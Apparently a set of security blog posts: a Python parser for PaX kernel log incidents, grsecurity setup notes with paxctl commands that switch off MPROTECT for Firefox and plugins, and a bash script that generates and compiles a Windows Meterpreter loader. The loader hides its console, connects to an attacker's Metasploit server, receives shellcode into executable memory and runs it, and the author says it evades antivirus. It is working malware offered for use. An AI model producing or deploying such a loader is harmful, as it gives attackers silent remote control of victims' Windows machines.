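    def pc_inside_mapping(self) -> bool:
        """Consistency check: the faulting PC should lie inside the reported mapping."""
        return self.start <= self.pc < self.end

    def kind(self) -> str:
        """Coarse label of where the refused code came from."""
        if self.mapping.startswith("<anonymous"):
            return "anonymous-mapping"
        if "(deleted)" in self.mapping:
            return "deleted-file-mapping"
        return "file-mapping"

def parse_pax_log(text: str) -> list:
    """Group the three consecutive PAX lines into one incident per killed task."""
    incidents, current = [], None
    for raw in text.splitlines():
        line = DMESG_TS.sub("", raw).strip()
        if m := ATTEMPT.match(line):
            current = PaxIncident(m["mapping"], int(m["start"], 16), int(m["end"], 16))
            incidents.append(current)
        elif (m := TERMINATE.match(line)) and current is not None:
            current.path, current.comm, current.pid = m["path"], m["comm"], int(m["pid"])
            current.uid, current.pc = int(m["uid"]), int(m["pc"], 16)
        elif (m := PCBYTES.match(line)) and current is not None:
            current.pc_bytes = bytes.fromhex(m["hexbytes"].replace(" ", ""))
    return incidents
```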

One additional thing I wanted to mention is that VirtualBox will not work with a grsec-patched kernel. No problem with that, I wanted to get rid of it anyway, so I have migrated all my vbox images to the KVM qcow2 format; KVM works perfectly under the grsec kernel.

It is also important to stress that some desktop applications need exceptions from PaX in order to work correctly. To make these exceptions you need to install the paxctl tool and modify the PaX flags of the individual binaries so that they run under the grsec kernel.

Firefox

 
root@Obelix:/home/user/firefox# paxctl -v firefox
PaX control v0.5
Copyright 2004,2005,2006,2007 PaX Team <pageexec@freemail.hu>
- PaX flags: -----m-x-e-- [firefox]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled
root@Obelix:/home/user/firefox# paxctl -v firefox-bin
PaX control v0.5
Copyright 2004,2005,2006,2007 PaX Team <pageexec@freemail.hu>

- PaX flags: -----m-x-e-- [firefox-bin]
MPROTECT is disabled
RANDEXEC is disabled
EMUTRAMP is disabled

In order to modify the PaX flags of the above binaries run the following

#paxctl -C binary 
#paxctl -m binary

In order for flash to work (and other plugins possibly) you need to do the same to the plugin-container executable as well as the libflashplayer.so

Some programs that need the above paxctl mods are: OpenOffice, Skype, Remmina, Opera…

Grsec is a great way to harden your Linux Box, especially when doing any kind of security research.

 

Customizing custom Meterpreter loader


This sounds crazy, but I have thought of slightly improving an already well-made piece of code, the meterpreter loader for Windows targets. Based on the work of Raphael Mudge I have decided to create a little C source code generator that includes a hardcoded IP address and port number for our Metasploit server. While the original concept is very good, some automation would be nice. The original article is here: blog.strategiccyber.com/2012/09/13/a-loader-for-metasploits-meterpreter/

The original source code on Github is here :  github.com/rsmudge/metasploit-loader

My modifications are simple: I have added hardcoded unsigned char arrays that get placed into the source code, so that when the final binary is executed it silently connects to the Metasploit server and loads your favorite Windows reverse_tcp payload.

Lets get customized !

Here is the code; you can place the shell script anywhere, just make sure you have mingw installed on your Linux box.

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"  
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port 

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <windows.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo '    WSADATA    wsaData;' >> temp.c 
echo '    WORD    wVersionRequested;' >> temp.c 
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo '         printf("ws2_32.dll is out of date.\n"); '>> temp.c 
echo '         WSACleanup(); '>> temp.c 
echo '        exit(1);'>> temp.c 
echo '    }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo '    printf("Bad things: %s\n", error);'>> temp.c 
echo '    closesocket(my_socket);'>> temp.c 
echo '    WSACleanup();'>> temp.c 
echo '    exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo '    int    tret   = 0;'>> temp.c 
echo '    int    nret   = 0;'>>temp.c 
echo '    void * startb = buffer;'>> temp.c 
echo '    while (tret < len) {'>>temp.c 
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo '        startb += nret;'>> temp.c 
echo '        tret   += nret;'>>temp.c 
echo '         if (nret == SOCKET_ERROR)'>> temp.c 
echo '            punt(my_socket, "Could not receive data");'>> temp.c 
echo '    }'>>temp.c 
echo '    return tret;'>> temp.c 
echo '}' >> temp.c  
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo '    struct hostent *        target;' >> temp.c 
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c 
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c 
echo '        punt(my_socket, ".");'>>temp.c 
echo '    target = gethostbyname(targetip);'>>temp.c 
echo '    if (target == NULL)'>>temp.c 
echo '        punt(my_socket, "..");'>>temp.c 
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo '    sock.sin_family = AF_INET;'>> temp.c 
echo '    sock.sin_port = htons(port);'>>temp.c 
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo '         punt(my_socket, "...");'>>temp.c  
echo '    return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo '  FreeConsole();'>>temp.c 
echo '    ULONG32 size;'>>temp.c 
echo '    char * buffer;'>>temp.c 
echo '    void (*function)();'>>temp.c 
echo '    winsock_init();'>> temp.c 
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo '    if (count != 4 || size <= 0)'>>temp.c 
echo '        punt(my_socket, "read a strange or incomplete length value\n");'>>temp.c 
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo '    if (buffer == NULL)'>>temp.c 
echo '        punt(my_socket, "could not allocate buffer\n");'>>temp.c 
echo '    buffer[0] = 0xBF;'>>temp.c 
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo '    function = (void (*)())buffer;'>>temp.c 
echo '    function();'>>temp.c 
echo '    return 0;'>>temp.c 
echo '}' >> temp.c 
echo 'Compiling binary ..' 
i586-mingw32msvc-gcc  temp.c -o payload.exe -lws2_32
ls -la payload.exe 

You will also need to load your listener with your favorite reverse TCP payload. So far I have tested this on Win7 32bit, Win7 64bit and Win8 64bit, it bypasses AVs fine.

Enjoy…


ExE ASCII


A quick post here. I have already written a Teensy loader for this, and thought somebody might enjoy it without the device.  So I decided to fill in a gap while all this craziness about BadBios is around…


Magical text here (it will only work in DOS/Win9x/Win2k/XP), so fire up your virtual machines … and enjoy some Descent …


Copy and paste the above text and save it with a .COM extension, then run it. Amazing what can be achieved in only 105 lines of ASCII data. Tested on Windows XP SP3.

 

 

 

 

 

